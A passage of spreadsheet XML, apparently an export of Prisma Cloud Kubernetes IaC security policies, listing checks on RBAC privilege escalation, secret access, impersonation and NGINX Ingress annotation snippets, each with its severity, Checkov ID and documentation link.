https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-roles-and-clusterroles-that-grant-permissions-to-bind-rolebindings-or-clusterrolebindings-are-minimized</t>
        </is>
      </c>
      <c r="Y1106" t="inlineStr"/>
      <c r="Z1106" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["ClusterRole","Role"]}</t>
        </is>
      </c>
      <c r="AA1106" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1106" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1106" t="inlineStr">
        <is>
          <t>CKV_K8S_157</t>
        </is>
      </c>
      <c r="AD1106" t="b">
        <v>1</v>
      </c>
      <c r="AE1106" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1106" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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6" t="inlineStr">
        <is>
          <t>26540a95-91c4-41fb-bbdf-a1521991149e</t>
        </is>
      </c>
      <c r="AI1106" t="inlineStr"/>
      <c r="AJ1106" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1106" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1107">
      <c r="A1107" t="inlineStr"/>
      <c r="B1107" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1107" s="2" t="inlineStr"/>
      <c r="D1107" t="inlineStr"/>
      <c r="E1107" t="inlineStr"/>
      <c r="F1107" t="inlineStr"/>
      <c r="G1107" t="b">
        <v>1</v>
      </c>
      <c r="H11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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1107" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:ClusterRole,Role</t>
        </is>
      </c>
      <c r="K1107" t="inlineStr">
        <is>
          <t>Kubernetes Roles and ClusterRoles that grant permissions to escalate Roles or ClusterRole are not minimized</t>
        </is>
      </c>
      <c r="L1107" t="inlineStr"/>
      <c r="M1107" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1107" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1107" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1107" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1107" t="inlineStr"/>
      <c r="R1107" t="inlineStr"/>
      <c r="S1107" t="inlineStr"/>
      <c r="T1107" t="b">
        <v>0</v>
      </c>
      <c r="U1107" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1107" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:ClusterRole,Role</t>
        </is>
      </c>
      <c r="W1107" t="inlineStr">
        <is>
          <t>Minimize Roles and ClusterRoles that grant permissions to escalate Roles or ClusterRole</t>
        </is>
      </c>
      <c r="X1107" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-roles-and-clusterroles-that-grant-permissions-to-escalate-roles-or-clusterrole-are-minimized</t>
        </is>
      </c>
      <c r="Y1107" t="inlineStr"/>
      <c r="Z1107" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["ClusterRole","Role"]}</t>
        </is>
      </c>
      <c r="AA1107" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1107" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1107" t="inlineStr">
        <is>
          <t>CKV_K8S_158</t>
        </is>
      </c>
      <c r="AD1107" t="b">
        <v>1</v>
      </c>
      <c r="AE1107" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1107" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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7" t="inlineStr">
        <is>
          <t>c88cc0a0-2670-460c-9420-bacf24ee91ae</t>
        </is>
      </c>
      <c r="AI1107" t="inlineStr"/>
      <c r="AJ1107" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1107" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1108">
      <c r="A1108" t="inlineStr"/>
      <c r="B1108" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1108" s="2" t="inlineStr"/>
      <c r="D1108" t="inlineStr"/>
      <c r="E1108" t="inlineStr"/>
      <c r="F1108" t="inlineStr"/>
      <c r="G1108" t="b">
        <v>1</v>
      </c>
      <c r="H11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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1108" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:ClusterRoleBinding,RoleBinding,ClusterRole,Role</t>
        </is>
      </c>
      <c r="K1108" t="inlineStr">
        <is>
          <t>ServiceAccounts and nodes that can modify services/status may set the `status.loadBalancer.ingress.ip` field to exploit the unfixed CVE-2020-8554 and launch MiTM attacks against the cluster</t>
        </is>
      </c>
      <c r="L1108" t="inlineStr"/>
      <c r="M1108" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1108" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1108" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1108" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1108" t="inlineStr"/>
      <c r="R1108" t="inlineStr"/>
      <c r="S1108" t="inlineStr"/>
      <c r="T1108" t="b">
        <v>0</v>
      </c>
      <c r="U1108" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1108" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:ClusterRoleBinding,RoleBinding,ClusterRole,Role</t>
        </is>
      </c>
      <c r="W1108" t="inlineStr">
        <is>
          <t>Ensure ServiceAccounts and nodes are not able to modify services/status</t>
        </is>
      </c>
      <c r="X1108" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/serviceaccounts-and-nodes-potentially-exposed-to-cve-2020-8554</t>
        </is>
      </c>
      <c r="Y1108" t="inlineStr"/>
      <c r="Z1108" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["ClusterRoleBinding","RoleBinding","ClusterRole","Role"]}</t>
        </is>
      </c>
      <c r="AA1108" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1108" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1108" t="inlineStr">
        <is>
          <t>CKV2_K8S_4</t>
        </is>
      </c>
      <c r="AD1108" t="b">
        <v>1</v>
      </c>
      <c r="AE1108" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1108" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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8" t="inlineStr">
        <is>
          <t>28c7c577-3842-43dd-b0d2-c0bbcc9cb7c8</t>
        </is>
      </c>
      <c r="AI1108" t="inlineStr"/>
      <c r="AJ1108" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1108" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1109">
      <c r="A1109" t="inlineStr"/>
      <c r="B1109" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1109" s="2" t="inlineStr"/>
      <c r="D1109" t="inlineStr"/>
      <c r="E1109" t="inlineStr"/>
      <c r="F1109" t="inlineStr"/>
      <c r="G1109" t="b">
        <v>1</v>
      </c>
      <c r="H11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09" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1109" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:ClusterRoleBinding,RoleBinding,ClusterRole,Role</t>
        </is>
      </c>
      <c r="K1109" t="inlineStr">
        <is>
          <t>No ServiceAccount/Node should be able to read all secrets</t>
        </is>
      </c>
      <c r="L1109" t="inlineStr"/>
      <c r="M1109" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1109" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1109" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1109" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1109" t="inlineStr"/>
      <c r="R1109" t="inlineStr"/>
      <c r="S1109" t="inlineStr"/>
      <c r="T1109" t="b">
        <v>0</v>
      </c>
      <c r="U1109" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1109" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:ClusterRoleBinding,RoleBinding,ClusterRole,Role</t>
        </is>
      </c>
      <c r="W1109" t="inlineStr">
        <is>
          <t>Ensure no ServiceAccount/Node is able to read all secrets</t>
        </is>
      </c>
      <c r="X1109" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/no-serviceaccountnode-should-be-able-to-read-all-secrets</t>
        </is>
      </c>
      <c r="Y1109" t="inlineStr"/>
      <c r="Z1109" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["ClusterRoleBinding","RoleBinding","ClusterRole","Role"]}</t>
        </is>
      </c>
      <c r="AA1109" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1109" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1109" t="inlineStr">
        <is>
          <t>CKV2_K8S_5</t>
        </is>
      </c>
      <c r="AD1109" t="b">
        <v>1</v>
      </c>
      <c r="AE1109" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1109" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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09" t="inlineStr">
        <is>
          <t>68c3a96c-84d7-43c0-8a6a-7eacecac27d2</t>
        </is>
      </c>
      <c r="AI1109" t="inlineStr"/>
      <c r="AJ1109" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1109" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1110">
      <c r="A1110" t="inlineStr"/>
      <c r="B1110" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1110" s="2" t="inlineStr"/>
      <c r="D1110" t="inlineStr"/>
      <c r="E1110" t="inlineStr"/>
      <c r="F1110" t="inlineStr"/>
      <c r="G1110" t="b">
        <v>1</v>
      </c>
      <c r="H11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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1110" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:ClusterRoleBinding,RoleBinding,ClusterRole,Role</t>
        </is>
      </c>
      <c r="K1110" t="inlineStr">
        <is>
          <t>RoleBinding should not allow privilege escalation to a ServiceAccount or Node on other RoleBinding</t>
        </is>
      </c>
      <c r="L1110" t="inlineStr"/>
      <c r="M1110" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1110" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1110" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1110" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1110" t="inlineStr"/>
      <c r="R1110" t="inlineStr"/>
      <c r="S1110" t="inlineStr"/>
      <c r="T1110" t="b">
        <v>0</v>
      </c>
      <c r="U1110" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1110" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:ClusterRoleBinding,RoleBinding,ClusterRole,Role</t>
        </is>
      </c>
      <c r="W1110" t="inlineStr">
        <is>
          <t>Ensure RoleBinding does not allow privilege escalation to a ServiceAccount or Node on other RoleBinding</t>
        </is>
      </c>
      <c r="X1110" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/rolebinding-should-not-allow-privilege-escalation-to-a-serviceaccount-or-node-on-other-rolebinding</t>
        </is>
      </c>
      <c r="Y1110" t="inlineStr"/>
      <c r="Z1110" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["ClusterRoleBinding","RoleBinding","ClusterRole","Role"]}</t>
        </is>
      </c>
      <c r="AA1110" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1110" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1110" t="inlineStr">
        <is>
          <t>CKV2_K8S_1</t>
        </is>
      </c>
      <c r="AD1110" t="b">
        <v>1</v>
      </c>
      <c r="AE1110" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1110" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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0" t="inlineStr">
        <is>
          <t>95361a8b-7942-416d-bd19-87b2c8f57d41</t>
        </is>
      </c>
      <c r="AI1110" t="inlineStr"/>
      <c r="AJ1110" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1110" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1111">
      <c r="A1111" t="inlineStr"/>
      <c r="B1111" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1111" s="2" t="inlineStr"/>
      <c r="D1111" t="inlineStr"/>
      <c r="E1111" t="inlineStr"/>
      <c r="F1111" t="inlineStr"/>
      <c r="G1111" t="b">
        <v>1</v>
      </c>
      <c r="H11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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1111" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:ClusterRoleBinding,RoleBinding,ClusterRole,Role</t>
        </is>
      </c>
      <c r="K1111" t="inlineStr">
        <is>
          <t>Granting `create` permissions to `nodes/proxy` or `pods/exec` sub resources allows potential privilege escalation</t>
        </is>
      </c>
      <c r="L1111" t="inlineStr"/>
      <c r="M1111" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1111" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1111" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1111" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1111" t="inlineStr"/>
      <c r="R1111" t="inlineStr"/>
      <c r="S1111" t="inlineStr"/>
      <c r="T1111" t="b">
        <v>0</v>
      </c>
      <c r="U1111" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1111" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:ClusterRoleBinding,RoleBinding,ClusterRole,Role</t>
        </is>
      </c>
      <c r="W1111" t="inlineStr">
        <is>
          <t>Ensure `nodes/proxy` or `pods/exec` sub resources do not have `create` permissions</t>
        </is>
      </c>
      <c r="X1111" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/granting-create-permissions-to-nodesproxy-or-podsexec-sub-resources-allows-potential-privilege-escalation</t>
        </is>
      </c>
      <c r="Y1111" t="inlineStr"/>
      <c r="Z1111" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["ClusterRoleBinding","RoleBinding","ClusterRole","Role"]}</t>
        </is>
      </c>
      <c r="AA1111" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1111" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1111" t="inlineStr">
        <is>
          <t>CKV2_K8S_2</t>
        </is>
      </c>
      <c r="AD1111" t="b">
        <v>1</v>
      </c>
      <c r="AE1111" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1111" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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1" t="inlineStr">
        <is>
          <t>1adf8c5c-67c2-498b-9022-fba893151928</t>
        </is>
      </c>
      <c r="AI1111" t="inlineStr"/>
      <c r="AJ1111" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1111" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1112">
      <c r="A1112" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B1112" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1112" s="2" t="inlineStr"/>
      <c r="D1112" t="inlineStr"/>
      <c r="E1112" t="inlineStr"/>
      <c r="F1112" t="inlineStr"/>
      <c r="G1112" t="b">
        <v>1</v>
      </c>
      <c r="H11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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1112" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:ClusterRoleBinding,RoleBinding,ClusterRole,Role</t>
        </is>
      </c>
      <c r="K1112" t="inlineStr">
        <is>
          <t>No ServiceAccount/Node should have `impersonate` permissions for groups/users/service-accounts</t>
        </is>
      </c>
      <c r="L1112" t="inlineStr"/>
      <c r="M1112" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1112" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1112" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1112" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1112" t="inlineStr">
        <is>
          <t>5.1 Config</t>
        </is>
      </c>
      <c r="R1112" t="inlineStr">
        <is>
          <t>5.1.1 Config - Other</t>
        </is>
      </c>
      <c r="S1112" t="inlineStr"/>
      <c r="T1112" t="b">
        <v>0</v>
      </c>
      <c r="U1112" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1112" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:ClusterRoleBinding,RoleBinding,ClusterRole,Role</t>
        </is>
      </c>
      <c r="W1112" t="inlineStr">
        <is>
          <t>Ensure no ServiceAccount/Node has `impersonate` permissions for groups/users/service-accounts</t>
        </is>
      </c>
      <c r="X1112" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/no-serviceaccountnode-should-have-impersonate-permissions-for-groupsusersservice-accounts</t>
        </is>
      </c>
      <c r="Y1112" t="inlineStr"/>
      <c r="Z1112" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["ClusterRoleBinding","RoleBinding","ClusterRole","Role"]}</t>
        </is>
      </c>
      <c r="AA1112" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1112" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1112" t="inlineStr">
        <is>
          <t>CKV2_K8S_3</t>
        </is>
      </c>
      <c r="AD1112" t="b">
        <v>1</v>
      </c>
      <c r="AE1112" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1112" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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2" t="inlineStr">
        <is>
          <t>4a7f5715-3c2a-457c-a5f8-b905d78b2943</t>
        </is>
      </c>
      <c r="AI1112" t="inlineStr"/>
      <c r="AJ1112" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1112" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1113">
      <c r="A1113" t="inlineStr"/>
      <c r="B1113" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1113" s="2" t="inlineStr"/>
      <c r="D1113" t="inlineStr"/>
      <c r="E1113" t="inlineStr"/>
      <c r="F1113" t="inlineStr"/>
      <c r="G1113" t="b">
        <v>1</v>
      </c>
      <c r="H11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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1113" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:Ingress</t>
        </is>
      </c>
      <c r="K1113" t="inlineStr">
        <is>
          <t>NGINX Ingress has annotation snippets</t>
        </is>
      </c>
      <c r="L1113" t="inlineStr"/>
      <c r="M1113" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1113" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1113" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1113" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1113" t="inlineStr"/>
      <c r="R1113" t="inlineStr"/>
      <c r="S1113" t="inlineStr"/>
      <c r="T1113" t="b">
        <v>0</v>
      </c>
      <c r="U1113" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1113" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:Ingress</t>
        </is>
      </c>
      <c r="W1113" t="inlineStr">
        <is>
          <t>Prevent All NGINX Ingress annotation snippets. See CVE-2021-25742</t>
        </is>
      </c>
      <c r="X1113" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/prevent-all-nginx-ingress-annotation-snippets</t>
        </is>
      </c>
      <c r="Y1113" t="inlineStr"/>
      <c r="Z1113" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["Ingress"]}</t>
        </is>
      </c>
      <c r="AA1113" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1113" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1113" t="inlineStr">
        <is>
          <t>CKV_K8S_153</t>
        </is>
      </c>
      <c r="AD1113" t="b">
        <v>1</v>
      </c>
      <c r="AE1113" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1113" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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3" t="inlineStr">
        <is>
          <t>5a7e7941-f1c4-4ddf-af78-155e0e0222d3</t>
        </is>
      </c>
      <c r="AI1113" t="inlineStr"/>
      <c r="AJ1113" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1113" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1114">
      <c r="A1114" t="inlineStr"/>
      <c r="B1114" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1114" s="2" t="inlineStr"/>
      <c r="D1114" t="inlineStr"/>
      <c r="E1114" t="inlineStr"/>
      <c r="F1114" t="inlineStr"/>
      <c r="G1114" t="b">
        <v>1</v>
      </c>
      <c r="H11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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1114" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:Ingress</t>
        </is>
      </c>
      <c r="K1114" t="inlineStr">
        <is>
          <t>NGINX Ingress annotation snippets contains LUA code execution</t>
        </is>
      </c>
      <c r="L1114" t="inlineStr"/>
      <c r="M1114" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1114" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1114" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1114" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1114" t="inlineStr"/>
      <c r="R1114" t="inlineStr"/>
      <c r="S1114" t="inlineStr"/>
      <c r="T1114" t="b">
        <v>0</v>
      </c>
      <c r="U1114" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1114" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:Ingress</t>
        </is>
      </c>
      <c r="W1114" t="inlineStr">
        <is>
          <t>Prevent NGINX Ingress annotation snippets which contain LUA code execution. See CVE-2021-25742</t>
        </is>
      </c>
      <c r="X1114" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/prevent-nginx-ingress-annotation-snippets-which-contain-lua-code-execution</t>
        </is>
      </c>
      <c r="Y1114" t="inlineStr"/>
      <c r="Z1114" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["Ingress"]}</t>
        </is>
      </c>
      <c r="AA1114" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1114" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1114" t="inlineStr">
        <is>
          <t>CKV_K8S_152</t>
        </is>
      </c>
      <c r="AD1114" t="b">
        <v>1</v>
      </c>
      <c r="AE1114" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1114" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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4" t="inlineStr">
        <is>
          <t>20885512-6025-4c23-a14d-b0ca7b63ed11</t>
        </is>
      </c>
      <c r="AI1114" t="inlineStr"/>
      <c r="AJ1114" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1114" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1115">
      <c r="A1115" t="inlineStr"/>
      <c r="B1115" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1115" s="2" t="inlineStr"/>
      <c r="D1115" t="inlineStr"/>
      <c r="E1115" t="inlineStr"/>
      <c r="F1115" t="inlineStr"/>
      <c r="G1115" t="b">
        <v>1</v>
      </c>
      <c r="H11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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1115" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:Ingress</t>
        </is>
      </c>
      <c r="K1115" t="inlineStr">
        <is>
          <t>NGINX Ingress has annotation snippets which contain alias statements</t>
        </is>
      </c>
      <c r="L1115" t="inlineStr"/>
      <c r="M1115" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1115" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1115" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1115" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1115" t="inlineStr"/>
      <c r="R1115" t="inlineStr"/>
      <c r="S1115" t="inlineStr"/>
      <c r="T1115" t="b">
        <v>0</v>
      </c>
      <c r="U1115" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1115" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:Ingress</t>
        </is>
      </c>
      <c r="W1115" t="inlineStr">
        <is>
          <t>Prevent NGINX Ingress annotation snippets which contain alias statements See CVE-2021-25742</t>
        </is>
      </c>
      <c r="X1115" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/prevent-nginx-ingress-annotation-snippets-which-contain-alias-statements</t>
        </is>
      </c>
      <c r="Y1115" t="inlineStr"/>
      <c r="Z1115" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["Ingress"]}</t>
        </is>
      </c>
      <c r="AA1115" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1115" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1115" t="inlineStr">
        <is>
          <t>CKV_K8S_154</t>
        </is>
      </c>
      <c r="AD1115" t="b">
        <v>1</v>
      </c>
      <c r="AE1115" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1115" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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5" t="inlineStr">
        <is>
          <t>5ca59fca-d24c-4c9e-8abc-9cb8355653d9</t>
        </is>
      </c>
      <c r="AI1115" t="inlineStr"/>
      <c r="AJ1115" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1115" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1116">
      <c r="A1116" t="inlineStr"/>
      <c r="B1116" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1116" s="2" t="inlineStr"/>
      <c r="D1116" t="inlineStr"/>
